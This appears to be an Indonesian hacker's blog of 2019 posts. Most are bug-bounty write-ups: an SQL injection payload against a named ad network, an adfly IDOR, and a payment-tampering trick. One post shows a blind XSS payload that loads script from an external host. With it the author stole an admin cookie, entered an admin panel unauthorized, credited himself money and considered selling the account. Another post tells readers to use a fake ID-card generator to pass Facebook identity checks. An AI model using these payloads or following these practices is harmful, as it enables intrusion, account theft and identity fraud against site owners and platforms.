Friday, May 24, 2019

Dapet THR berkat Simple But Dengerous Bug [BugBounty - SQL injection ]

Hasil gambar untuk ad network

BugBounty - SQL injection - Halo sobat, pada kesempatan kali ini saya mau share nih pengalaman saya dapat THR dari satu adnetwork bernama Badhits. jadi waktu itu saya sedang buka group IndoXploit, disana bug hunter bernama noobsec menyarankan saya untuk mencari target adsnetwork di website adswiki.net. jadi saya pun mencari disitu, langsung saja saya filter berdasarkan bintang. Kebetulan badhits ini bintangnya 5 dan saya pun tertuju untuk melakukan pentest di web tersebut.

Setelah itu saya membuka web badhits.com dan disana hanya terdapat form login tanpa form register, ternyata badhits sendiri hanya membuka registrasi bagi yang menggunakan kode referal. contohnya refferal code milik saya Disini. Nah disini saya penasaran sama request get dari accesskey= apakah bisa / possible buat di sqli ? awalnya saya berfikir "ah gk mungkin ini vuln" karena udh sering saya mencoba test sqli di url refferal tapi hasilnya zonk.

Setelah itu saya akhirnya mencoba menambahkan Quote setelah accesskey=[idreferral].
https://badhits.com/register.php?accesskey=YHR5AGySRb'

Ternyata response nya "mysql error". dalam hati saya berfikir " wah vuln nih boleh juga.

akhirnya saya mencoba metode union based. ternyata saat mencari magic number tidak keluar alias error.

lalu saya mencoba metode Xpath Injection (Extractvalue) dan akhirnya bisa boise.

Setelah itu saya mencoba mendump 1 user sebagai bukti yaitu akun si admin badhits. ternyata passwordnya di hash, saya tidak tau itu hash jenis apa. akhirnya saya menemukan table pwreset yg ternyata berisi code untuk mereset password akun.
Dikarenakan metode extractvalue memiliki limit dalam mengeluarkan output, saya cari metode lain.
Saya pun gunakan Double Query Error Based SQL injection. jadi seperti ini :


https://badhits.com/register.php?accesskey=-YHR5AGySRb' and SELECT 1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(QUERY SQL LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)%23

Saya pun mendapatkan akun admin, dan langsung melaporkan ke pihak admin.
Saya tanyakan apakah dia punya bug bounty program , cs nya pun menjawab :




Langsung saja setelah itu saya laporkan ke email tersebut. Satu jam setelah saya melaporkan hal tersebut, pihak badhits menindaklanjuti bug tersebut. 30 menit kemudian bug tersebut sudah diperbaiki.



Video Poc :




Setelah itu saya dikirim $65, walaupun kecil yang penting bisa buat beli baju lebaran hehehe.
Timeline :
19 Mei 2019 22:10 = Bug Reported
19 Mei 2019 23:38 = Triaged
20 Mei 2019 00:09 = Bug Fixed & Ask for payments
24 Mei 2019 00:08 = $65 send to amy paypal :D

Thx guys. 



 
Read more

Sunday, May 19, 2019

[BUGBOUNTY] Able to see everyone original url on ADFLY


Rafli hax0r - Pada Kesempatan kali ini saya mau membagikan temuan saya lagi nih. sebenarnya ini sudah saya temukan 3 minggu lalu, saya juga sudah membuatkan video write up di youtube, nah sekarang saya mau buat versi blog nya nih. sebelumnya kalian tau ga sih apa itu adfly ? yuk simak dulu.

Apa itu adfly ?
     Adfly adalah salah satu ads network terbesar yang ada diinternet, khususnya dalam urusan "URL shortener" . adfly sendiri banyak dipilih orang karena alasan withdraw mudah dan minimum saldonya rendah serta sudah terpercaya sejak lama.

nah sudah tau kan ? Yuk cekidot kita bahas masalah bugnya.

Saat itu saya sedang boring, kemudian pikiran saya tertuju kepada adfly karena ingin ngecek saldo saya di adfly. Setelah itu saya kepikiran "Ini kan website penghasil uang, bagaimana kalau saya cari bug disini, siapa tau dia ada sedikit hadiah buat saya ;v" langsung deh saya nyari selama 20 menit, sambil membuka Fiddler 4 . Tidak lama kemudian saya mendapatkan 2 bug sekaligus. namun yang saya laporkan hanya satu yakni Broken Access Control.

How To Reproduce :
1. Open https://adf.ly/publisher/getLink?token=&id=
2. Wajib Login terlebih dahulu.
3. Pergi ke intruder ( brute forcer ) submit ke param id dari 1 - 1000
4. Maka Kita bisa tau Original url dari shortened url tersebut.

Video PoC :
`



Setelah itu saya melaporkan keadmin.  2 hari setelah report saya mendapat tanggapan dan dijanjikan hadiah. tapi hingga sekarang hadiah tersebut masih khayalan semata :(. Baiklah terimakasih sudah berkunjung semoga kalian sehat selalu amin ya rabb. semoga Bulan Puasa kali ini penuh berkah.

Timeline :
27 April 2019 = Reported This Bug
29 April 2019 = Triaged, after +- 10 minutes Bug Fixed (Dijanjikan Hadiah)
Until Now      = Masih digantungin sad banget guys ;v


Read more

Monday, May 13, 2019

Ngintip Admin panel Website Followers berujung Keberuntungan

Blind XSS vulnerability
Hasil gambar untuk xss

Rafli Hax0r - Halo kembali lagi di rafli hax0r kali ini saya mau cerita cerita pengalaman saya dapat uang jajan dari website jual beli followers . Saya nemuin ini saat saya sedang gabut / bosen dirumah :'v kebetulan ada teman facebook yang menjual akun vip-member.id . Setelah itu terlintas dipikiran saya "Kenapa engga coba pentest aja ? Biasanya Web followers kek gini securitynya engga terlalu dipentingin" karena kebetulan ini web cukup terkenal ( followers murah + cepat, mau beli ? kontak saya hehe :'v ).

Setelah itu saya pun nyari nyari di web tersebut selama sekitar 15 menit engga ketemu temu . nah saya terlintas kenapa engga cari subdomain / domain lain yang satu owner sama ini web ? saya pun mencari cari dan ternyata nemu domain kodokoalamedia.co.id.

Saya pun jalan jalan diwebsite tersebut selama kurang lebih 20 menit. Sampai saya menemukan form Pemesanan, disana terdapat kolom nama, nomor, pesan dan produk yang dipesan. nah disitu terlintas dalam fikiran saya (Negative Think) wah bagaimana kalo masukin payload xss trus masuk sebagai admin lalu memproses pembayaran saya :'v saya pun bergegas membuka xsshunter.com lalu mengambil payload :

"><script src=https://l33t1337(.)xss.ht></script>
Dan memasukkannya di kolom nama serta pesan. Karena kebetulan waktu itu malam malam saya berfikir ah mungkin adminnya lagi tidur, tunggu besok saja lah. Esok harinya saya melihat xsshunter lagi dan ternyata benar saja adminnya membuka panel dan xss saya fired. Ketika saya mengambil cookienya sudah expired saya pun mencoba kembali "Pura Pura Pesan" dan pada akhirnya setelah nunggu 30 menit si admin login kembali :'v saya pun dapat cookienya. Seketika saya bisa masuk admin panel.. disana saya menambahkan diri saya sebagai reseller tanpa harus bayar + karena minimum member vip-member.id adalah 1jt saya langsung bisa daftar tanpa uang 1jt, saya pun menambahkan saldo saya menjadi 5jt. disitu saya merasa SENANG sekali guys :'v karena saldo saya 5jt. Saya sudah sempat ingin menjual akun tersebut kemedia sosial, namun....



Setelah ngegabut dipanel admin saya melihat "History Login Admin.txt" didalam panel, karena tidak bisa diedit saya pun panik karena IP saya sudah ada disitu. SAya pun mencari dimedsos seputar pemilik web tersebut, Benar saja ternyata Pemilik web tersebut memiliki 16 teman yang sama seperti saya , Dia juga membuka program bug bounty bagi yang menemukan bug akan di berikan hadiah 1jt. Ketika itu juga saya pun bergegas menkontak adminnya via wa karena difacebook tidak aktif , namun si admin yang megang wa itu bukan developer / ownernya melainkan hanya pekerja saja so saya nunggu aja deh. Eh Ternyata ownernya ngebales pesan saya dia pun Bertanya tanya seputar bug tersebut .seketika dia bilang " Sini ATM kamu, biar semangat saya kasih DP nya dulu" lalu dalam hati saya berkata "Njir ini admin tumben pengertian :'v" yowes saya kirim aja deh rekening ovo ku.
Dia pun mengirim uang sejumlah Rpx.xxx.000 NAMUN itu bukan keseluruhan hadiah karena dia bilang " Ini buat buka puasa ntar, nanti ada lagi buat sahur+buka puasa setelah bug ini saya perbaiki" . Saya nambah semangat nih :'v saya pun berkata dalam hati "Duh ini gede menurutku untuk kategori xss di website lokal, tokopedia, bukalapak dan kawan kawan pun sepertinya lebih kecil dari ini". Ternyata usut punya usul si admin web ngasih 1jt (DP) karena ane berhasil masuk ke admin panel. Nah abis buka puasa si admin selesai memperbaiki saya pun dikirim lagi sebesar Rpx.xxx.000 + Saldo panel 500.000 , saya pun merasa bersukur karena hal itu dan akhirnya duitku kukasih emak buat makan makan bareng keluarga .

Reward Berupa uang :



Reward Saldo Panel :



Itulah pengalaman saya, untungnya saya tidak mengacak ngacak web tersebut dan mendapat hal yang lebih baik karena meninggalkan kejahatan. Btw adminnya dapet heker jahat yang ngebobol tu web, pengen di tindak lanjuti :'v. untung saya engga hehe.

TimeLine :

- Jum'at 11 maret 2019 = Bug Found & First Report
- Sabtu 12 Maret 2019 14:30 = Triaged by their team & Gave me $$$ [1st Reward]
- Sabtu 12 mei 2019 21:30 = Bug Fixed & 2nd Reward Given to me

Cepet banget guys :'v


-Rafli Pasya ( ./z3rb0a / lov3code )


Read more

Friday, April 26, 2019

Terlalu cinta Twice, seorang hacker meretas website Humas Polri

Terlalu cinta Twice, seorang hacker meretas website Humas Polri
         Setelah 4 hari yang lalu Twice merilis lagu baru yang berjudul "Fancy" ternyata ada fans dari indonesia yang mencurahkan isi hatinya di website Divisi Humas Polri. Website tersebut diketahui sudah diretas beberapa jam yang lalu oleh hacker yang mengatasnamakan timnya " FAC (Inisial)" entah apakah dia seorang wibu atau hanyalah pecinta cewe korea.

     Saya pun sempat kaget "WOW!" gila ya goaid dihack sama dia. usut punya usul ternyata dia mensoceng email PID Divisi Humas Polri dengan mengirim email atas nama personil / Pegawai Website tersebut. Di dalamnya hanya berisi :

Saya Cinta Twice

       Dari kejadian ini kita bisa mengambil pelajaran bahwa jangan lupa untuk mengecek dari mana email tersebut terkirim. karena hacker tidak hanya beraksi lewat dunia cyber security, tapi bisa saja Social Enginnering. Olehkarena itu Pihak pihak Cusotomer Service wajib waspada bila ada kejadian serupa.

      Sampai Artikel ini ditulis belum ada perbaikan dari website tersebut karena ini baru 30 menit setelah saya mendapatkan informasi dari hacker tersebut.

Link : https://humas.polri.go.id/download/saya-cinta-twice/

     Sekian Berita yang saya bagikan semoga bermanfaat. Sampai lupa di next artikel.
Read more

Monday, April 22, 2019

IDOR or Parameter Tampering was able me to pay less than they should

IDOR or Parameter Tampering was able me to pay less than they should




[ Indonesia ]
 Halo Selamat datang diwebsite saya, kali ini saya akan berbagi pengalaman saya menemukan Bug Parameter Tampering di sebuah website yang memiliki program bug bounty. sayangnya bug yang saya temukan ini duplicate dan belum dipatch sehingga saya akan mensensor website tersebut. baiklah mari baca awal mula saya menemukan bug ini.

 The Stories

Saya sedang bermain game pada waktu itu, sampai saya bosen karena koneksi nya lemot. Akhirnya saya memutuskan untuk keluar game, dan saya seperti biasa nonton youtube dengerin lagu, typerace sama anas anas. Dan saya bicara dalam hati “Duh bosen nih, Iseng ah cari cari bug kali aja nemu hehehe”. Okelah setelah itu saya tertuju ke salah satu platform bug bounty dan interested dengan suatu program yang ada disana.
 Setelah 20 Menit mencari saya menemukan Celah yang membuat saya bisa membeli salah satu item yang ada di suatu PAKET ITEM. Tapi setelah saya cek lebih dalam hanya work pada paket yang isinya free. Saya bingung, paket item tersebut seharga 20ribu tapi setelah dibypass saya tidak perlu bayar dan dibawa kehalaman pemilihan item, dan boom item tersebut jadi gratis, lalu saya mencobanya dan berhasil. saat itu saya sudah mau menulis laporan tapi karena saya masih penasaran, saya pun mencoba paket lain. Ternyata jika item didalam paket tersebut masih bayar kita tidak bisa memakainya. jadi saya menyimpulkan wah ini mah bugnya hanya “Membeli item secara satuan dengan parameter tampering” sehingga saya ragu. tapi dalam benak saya “Wah ini kayanya bug nya bagus deh soalnya dia gk bisa beli satuan, tapi kalo di bypass dia bisa beli”. Ane pun seneng tuh, Eh saat ane dorking di google ternyata paketan satuan tersebut bisa didorking. Saya langsung sedih karena gagal senang :’V. 


 Saya sempet Istirahat sekitar 15 menitan trus saya mendapat wahyu “Oh iya kenapa engga Coba parameter Top Up ?”


Saat itu saya menemukan Parameter seperti ini :

 http://mytarget.com/payment.php?id=[IDPEMESANAN]&nm=[redacted]500000&hg=[vulnparameter]&nama=[urname]&tlp=213123&mail=[mail]&dom=[notimportant]&ex=[lulz]&tipe=2

Saya pun merubah parameter hg dengan nominal 1000 karena jika nominalnya 0 server nya menolak. Dan setelah saya forward dia berhasil, saya pun mulai tertawa sendiri dan seneng banget coy.


Disitu tertulis total yang harus dibayar hanya 1000 dan itemnya seharga 500000. tapi disitu tertulis tidak ada metode pembayaran yang tersedia akhirnya parameter tipe= saya ganti dari 2 jadi 1. disitu tersedia pembayaran via bank. saya pun langsung membayarnya dan Pembayaran sukses :)


Saya Pun membuat laporan dan melaporkannya ke Pihak mereka. Setelah seminggu menunggu ternyata Laporannya dianggap Duplicate dengan severity HIGH. 
Cukup sekian itu aja yang bisa saya bagikan, have a nice day :D

Timeline :
14 April = Found & Reported to their team
22 April = Accepted as Duplicate
Severity : High
Rewarded : SWAG as appreciation

English Language at my medium story @androgaming1912
Read more

Monday, February 18, 2019

Cara Mengatasi Konfirmasi Identitas agar Facebook Bisa di buka Kembali

Cara Mengatasi Konfirmasi Identitas agar Facebook Bisa di buka Kembali
Hasil gambar untuk Verif Data diri facebook

Halo kawan kawan Rafli Hax0r kembali lagi bersama saya nih di website ini. Pada Kesempatan kali ini tepatnya besok adalah hari kedua saya ulangan ( Matematika coy ) saya mendapatkan ide untuk update blog ini. oleh karena itu kalian pasti butuhkan tutornya ? oke simak ya..

Konfirmasi Identitas Account Facebook biasanya terjadi ketika anda memposting hal berbau spam seperti gore, sara, dan pelecehan seksual serta pornografi. Jika sudah seperti ini anda biasanya dimintai Foto KTP ataupun identitas diri seperti KTP, SIM, dll. Nah kalian kan kaum milenial biasanya gk mau kan KTP nya kesebar / ribet nyari nyari KTP ? Nah saya ada solusinya nih simak baik baik yah.

Tutorial :
  1. Buka Link FakeKTP terbaru : Disini
  2. Nah Kalian isi deh tuh, kalau bisa nama di ktp disesuain sama nama FB nya ya agar mudah nantinya..
  3.  Tunggu 1x24 Jam maka akun akan terbuka
Oke Itu aja untuk artikel kali ini, ini simple banget btw. Oh iya bagi kalian yang mau change name FB tanpa nunggu 60 hari bisa kunjungi artikel sebelumnya : Disini ( FakeKTP pakai link terbaru ) Semoga Bermanfaat sampai jumpa di lain artikel :)
Read more

Thursday, January 24, 2019

Cara Rahasia Diterima Google Adsense Dengan Cepat, Cuma 2 hari !

 Cara Rahasia Diterima Google Adsense Dengan CepatCuma 2 hari !



     Tips Rahasia Diterima Google dengan cepat sebenarnya mudah, hanya saja butuh kesabaran ketelitian dan keuletan agar diterima. Nah Dipostingan kali ini semoga kalian bisa mengerti dan langsung diterima setelah membaca postingan ini. Tapi Pertama tama kalian disunnahkan untuk kl1k 1kl4n nya terlebih dahulu agar saya semangat ngeblog. Sebelum kalian tau apa tips and trick diterima adsense dengan mudah kalian harus tau dulu apa itu Google Adsense, siapa tau ada salah satu dari kalian yang belum mengerti.

     Google Adsense adalah program kerjasama periklanan melalui media Internet yang diselenggarakan oleh Google. Melalui program periklanan AdSense, pemilik situs web atau blog yang telah mendaftar dan disetujui keanggotaannya diperbolehkan memasang unit iklan yang bentuk dan materinya telah ditentukan oleh Google di halaman web mereka. Pemilik situs web atau blog akan mendapatkan pemasukan berupa pembagian keuntungan dari Google untuk setiap iklan yang diklik oleh pengunjung situs, yang dikenal sebagai sistem pay per click (ppc) atau bayar per klik.


Nah Kalian sudah tau kan ? Langsung aja nih saya akan kasih tau tips nya


  1. Blog Tidak berisi hal-hal yang dilarang oleh google
    Google sudah tegas jika kalian mengandung unsur unsur yang berbau jahat pasti bakal dibanned / tidak memenuhi aturan. Yang "jahat" tapi diperbolehkan : mod;phising;deface;hacking.
    Contoh Terlarang : Crack, Film bajakan, Judi, Porno, dan musik copyright
  2. Membuat halaman pendukung
    seperti : About Us, Contact Us, Disclaimer, dan Privacy Policy. Halaman pendukung ini sangat penting karena google selalu ingin agar tidak ada halaman kosong / rusak di website / blog pengiklan.
  3. Template Responsive
    Template yang Responsive disenangi oleh google karena template yang responsive pasti membuat Visitor senang dengan pengalamannya berkunjung keblog tersebut. otomatis iklan juga akan tayang dengan benar dan pasti banyak klik.
  4. Konsisten Mengupdate Artikel
    Google juga manusia, siapa pun yang caper ke dia pasti akan dituruti permintaannya. Sama halnya dengan daftar adsense, jika ingin cepat diterima kalian harus sering sering update artikel sebelum request ke Adsense, baru setelah keterima terserah anda.
  5. Artikel Panjang, Jelas dan Detail
    Artikel yang bagus ia lah artikel yang memiliki lebih dari 300 karakter agar memerlukan waktu membacanya. Jika Visitor Membaca Terlebih dahulu maka jika diterima adsense maka visitor dapat melihat iklan dengan jelas dan mungkin saja tertarik lalu mengklik iklan tersebut.
Nah Tadi itu beberapa tips and trik Keterima Adsense, Tidak percaya ? Loh buktinya adsense saya ini keterima cuma 2 hari coy bayangin ! gimanna gk gampang tuh. Oke deh cukup sampai disini ya, sayanya juga sudah lelah ngetik ini sampai jumpa dipostingan berikutnya ya byebye :*
Read more